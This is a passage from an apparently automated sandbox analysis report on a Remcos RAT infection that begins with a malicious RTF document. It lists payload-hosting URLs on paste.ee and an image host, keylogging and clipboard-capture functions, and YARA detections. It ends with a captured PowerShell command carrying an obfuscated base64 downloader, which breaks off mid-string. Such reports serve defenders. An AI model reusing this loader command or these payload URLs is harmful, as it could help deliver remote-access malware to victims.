Source: bhv497F.tmp.29.dr, bhv65C6.tmp.33.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: chp6F39.tmp.33.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegAsm.exe, 0000001D.00000002.603922456.000000000072A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.605755177.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, chp31FB.tmp.29.dr, chp6F39.tmp.33.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chp6F39.tmp.33.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wscript.exe, 0000000A.00000003.526410827.0000000003880000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 0000000A.00000003.526410827.0000000003880000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: bhv65C6.tmp.33.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: RegAsm.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000012.00000002.568213344.0000000003669000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 0000000A.00000003.528462004.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.478336096.000000000062E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.525193378.000000000062E000.00000004.00000020.00020000.00000000.sdmp, beautifulrosepictureforcuple[1].gif.9.dr, beautifulpictureforcouples.vbs.9.dr String found in binary or memory: https://pastcretinizar.cretinizarcretinizar/d/0FQ71
Source: wscript.exe, 0000000A.00000003.478346541.0000000002AA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pastcretinizar.cretinizarcretinizar/d/0FQ71lc
Source: wscript.exe, 0000000A.00000003.525353252.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.525155349.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.525193378.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.533717886.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.526606070.0000000000667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/
Source: wscript.exe, 0000000A.00000003.525353252.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.525155349.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.525193378.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.533717886.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.526606070.0000000000667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/1
Source: wscript.exe, 0000000A.00000003.525193378.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.525353252.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.525155349.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.525193378.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.533717886.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.528030392.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.525332937.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.526410827.0000000003880000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.526606070.0000000000667000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.533717886.00000000006C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/0FQ71
Source: wscript.exe, 0000000A.00000003.525193378.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.528030392.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.525332937.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.533717886.00000000006C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/0FQ71Win
Source: bhv497F.tmp.29.dr, bhv65C6.tmp.33.dr String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhv497F.tmp.29.dr, bhv65C6.tmp.33.dr String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: RegAsm.exe, 0000001D.00000002.603922456.000000000072A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.605755177.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, chp31FB.tmp.29.dr, chp6F39.tmp.33.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: RegAsm.exe, 0000001D.00000002.603922456.000000000072A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.605755177.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, chp31FB.tmp.29.dr, chp6F39.tmp.33.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: RegAsm.exe, 00000021.00000002.605755177.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, chp31FB.tmp.29.dr, chp6F39.tmp.33.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: wscript.exe, 0000000A.00000002.537465761.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.528048845.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.527329482.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.525009193.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.525134111.00000000039D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.524983723.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.572740647.0000000004F33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: wscript.exe, 0000000A.00000003.526410827.0000000003880000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.gravatar.com
Source: bhv497F.tmp.29.dr, bhv65C6.tmp.33.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: wscript.exe, 0000000A.00000003.526410827.0000000003880000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000012.00000002.568213344.000000000277A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000012.00000002.572740647.0000000004F16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/images/00
Source: powershell.exe, 00000012.00000002.572740647.0000000004EDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
Source: bhv497F.tmp.29.dr, bhv65C6.tmp.33.dr String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
Source: RegAsm.exe, 0000001D.00000002.603922456.000000000072A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.605755177.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, chp31FB.tmp.29.dr, chp6F39.tmp.33.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: wscript.exe, 0000000A.00000003.526410827.0000000003880000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 0000001F.00000002.582535382.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: RegAsm.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: RegAsm.exe, 0000001D.00000002.603922456.000000000072A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.605755177.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, chp31FB.tmp.29.dr, chp6F39.tmp.33.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: wscript.exe, 0000000A.00000003.526410827.0000000003880000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com;
Source: wscript.exe, 0000000A.00000003.526410827.0000000003880000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: bhv497F.tmp.29.dr, bhv65C6.tmp.33.dr String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49227
Source: unknown Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49226
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49225
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49224
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49223
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49222
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49221
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49220
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown Network traffic detected: HTTP traffic on port 49204 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49227 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown Network traffic detected: HTTP traffic on port 49242 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49207 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49199 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49219
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49218
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49217
Source: unknown Network traffic detected: HTTP traffic on port 49233 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49216
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49215
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49214
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49212
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49211
Source: unknown Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49210
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49245 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49224 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49209
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49207
Source: unknown Network traffic detected: HTTP traffic on port 49230 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49251 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49205
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown Network traffic detected: HTTP traffic on port 49219 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49203
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49201
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49225 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49231 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49239 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49216 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49250 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49247 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49205 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49236 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49211 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49253 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49223 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49237 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49252 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49214 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49220 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49253
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49252
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49251
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49250
Source: unknown Network traffic detected: HTTP traffic on port 49249 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49203 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49228 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49198 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49234 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49217 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49249
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49248
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49247
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49246
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49245
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49244
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49243
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49242
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49241
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49240
Source: unknown Network traffic detected: HTTP traffic on port 49248 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49209 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49221 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49240 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49197 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49212 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49235 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49239
Source: unknown Network traffic detected: HTTP traffic on port 49218 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49243 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49237
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49236
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49235
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49234
Source: unknown Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49233
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49199
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49232
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49231
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49230
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown Network traffic detected: HTTP traffic on port 49201 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49193
Source: unknown Network traffic detected: HTTP traffic on port 49226 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49229 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49229
Source: unknown Network traffic detected: HTTP traffic on port 49215 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49228
Source: unknown Network traffic detected: HTTP traffic on port 49232 -> 443
Source: unknown HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49167 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000 28_2_0040A2B8
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard, 28_2_0040B70E
Contains functionality to modify clipboard data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 28_2_004168C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 29_2_0040987A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 29_2_004098E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 30_2_00406DFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 30_2_00406E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 31_2_004068B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 31_2_004072B5
Contains functionality to read the clipboard data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard, 28_2_0040B70E
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 28_2_0040A3E0

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.4529110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.4529110.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000002.1114379537.0000000000571000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1113827756.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1114379537.0000000000555000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.568213344.0000000004346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4380, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 18.2.powershell.exe.4529110.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 18.2.powershell.exe.4529110.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 18.2.powershell.exe.4529110.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 18.2.powershell.exe.4529110.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.powershell.exe.4529110.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001C.00000002.1113827756.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001C.00000002.1113827756.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000002.1113827756.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000012.00000002.568213344.0000000004346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3100, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 4380, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\beautifulroseipictureiseenitsshowingasabeautifulflowerwhichcomingfromtheworldanditsshowinghowbeautiful___sheiswhenthatroseonhairbeautiful[1].doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49740FD3.doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Microsoft Office drops suspicious files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\D1ae4.url Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\pop.tg.url Jump to behavior
Very long command line found
Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 8806
Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 8806 Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}\ProgID Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8D